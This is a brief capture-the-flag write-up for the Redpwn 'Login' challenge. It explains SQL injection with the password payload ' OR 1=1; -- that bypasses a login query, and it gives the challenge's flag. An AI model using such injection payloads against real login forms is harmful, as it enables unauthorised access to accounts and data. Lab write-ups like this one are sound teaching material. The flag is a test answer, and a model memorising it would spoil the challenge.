Redpwn CTF

Login [148 pts]

 Challenge Description

Challenge Description:

This challenge is just basic SQL Injection.

The query used could be something like:

SELECT * 
FROM users
WHERE
    username = '{USER_NAME}' 
    AND
    password = '{PASSWORD}'
...
;

If we enter any username, say admin and password ' OR 1=1; --, the query would become

SELECT * 
FROM users
WHERE
    username = 'admin' 
    AND
    password = '' OR 1=1; --'
...
;

Now, the query just returns all the rows in the table because of OR 1=1. That leads to an alert message with the flag flag{0bl1g4t0ry_5ql1}.

Various other SQL injection attack payloads can be found here.